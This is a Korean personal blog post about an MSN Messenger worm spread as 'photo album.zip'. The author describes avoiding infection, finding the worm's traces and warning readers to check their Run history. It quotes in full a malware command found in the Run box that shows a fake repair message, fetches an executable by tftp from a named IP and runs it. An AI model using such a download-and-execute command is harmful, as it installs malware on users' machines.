달력

082018  이전 다음

  •  
  •  
  •  
  • 1
  • 2
  • 3
  • 4
  • 5
  • 6
  • 7
  • 8
  • 9
  • 10
  • 11
  • 12
  • 13
  • 14
  • 15
  • 16
  • 17
  • 18
  • 19
  • 20
  • 21
  • 22
  • 23
  • 24
  • 25
  • 26
  • 27
  • 28
  • 29
  • 30
  • 31
  •  

회사에서 일하고 있는데 MSN메신저에 등록된 초등학교 친구로부터
파일이 하나 전송되었다..

평소에 대화를 잘 하지 않는 친구였는데..
갑자기 파일을 보내다니.. 이상하다 생각은 했지만.. 수락해서 받았고,
파일이름은 photo album.zip 이였다.

파일을 클릭해서 여니 photo album2007.pif 이라는 파일이 들어있었고,
다행이 압축을 특정 경로에 풀어서 실행한게 아니라 알집에서 더블클릭해서 오픈한 것이기에..
TMP 디렉토리에 풀리게 되었었다.

즉시 하우리 백신 프로그램에서 바이러스라는 경보를 띄우면서 차단했고
다행히 바이러스로 부터 탈출을 했다.


이상해서 친구에게 대화를 걸었더니 어제 바이러스에 감염되었다고 말하면서 다 잡은줄 알았는데 잘 모르겠다는
말도 이어졌다.

일단은 백신 프로그램을 받고 설치한 후에 인터넷 선을 제거하고 바이러스부터 잡으라는 말을 했다.

도스시절에야 F5키를 눌러서 부팅하고 V3로 모든 파일을 점검하면 끝이였으나 지금은 백신프로그램도
프로그램이기에 설치를 해야되서 초보자인 친구들에게 어떻게 하라..라는 설명을 하기도 무척이나 애매하다.



몇 시간뒤..
다시 메신저 창이 열리면서
hey man accept my new photo album.. :( ...
라는 내용이 떴다..그제서야 눈치챘고 확인해보니 바이러스가 확실했다.

네이버에 관련 뉴스가 떠서 링크를 해본다.

메신저로 급속 확산 ‘웜’ 주의보…메신저 전송 사진 열지 마세요


이후 뉴스에 나와있는 rdshost.dll 파일이 시스템에 존재하지 않을까 라는 우려로
파일찾기를 통해 검색하던 중.. 시스템이 심하게 버벅거리는 현상이 발생..
Windows 작업관리자를 호출, explorer.exe 프로세서를 죽이고 다시 실행하려고 들어갔는데..

실행창에 알수없는 명령이 남겨져있었다.

%comspec% /c echo Repairing user32.dll & echo Please wait... & tftp -i 38.98.159.34 GET otdxxgcf.exe & start otdxxgcf&

대충 내용을 보니..
1. command prompt를 띄우고
2. user32.dll 파일을 고친다는 메시지를 띄우면서
3. 38.98.159.34 주소를 가진 호스트로 접속해서
4. otdxxgcf.exe파일을 받아서 실행해라.

이상하단 생각에..
일단 IP를 조회했다.

OrgName:    Performance Systems International Inc.
OrgID:      PSI
Address:    1015 31st St NW
City:       Washington
StateProv:  DC
PostalCode: 20007
Country:    US


미국 워싱턴에 있는 PSI 의 IP였다. 소득없이 허탕..
게다가 현재에 ping을 쏴봐도 응답이 없었다. 개인PC로 생각될뿐..

실행파일명을 구글에서 조회해도 아무런 결과는 없고..
(보나마나 뻔하다.. 임의로 생각되는 파일임이 분명..)


혹시 MSN메신저로 그러한 파일을 요청을 받은 적이 있는가?
그렇다면 시작버튼을 누르고 실행에서 명령 기록을 한번 확인해보십시오.

사용자 삽입 이미지


자.. 여러분의 PC는 안전하십니까??

Posted by 컴ⓣing